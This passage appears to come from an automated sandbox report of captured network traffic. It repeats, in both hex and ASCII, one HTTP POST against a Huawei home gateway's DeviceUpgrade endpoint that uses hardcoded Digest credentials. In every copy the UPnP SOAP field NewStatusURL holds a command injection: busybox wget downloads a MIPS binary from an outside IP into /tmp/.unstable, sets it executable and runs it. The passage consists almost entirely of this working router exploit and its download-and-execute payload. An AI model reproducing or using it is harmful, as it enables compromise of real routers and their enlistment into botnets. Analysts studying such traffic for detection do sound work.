xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 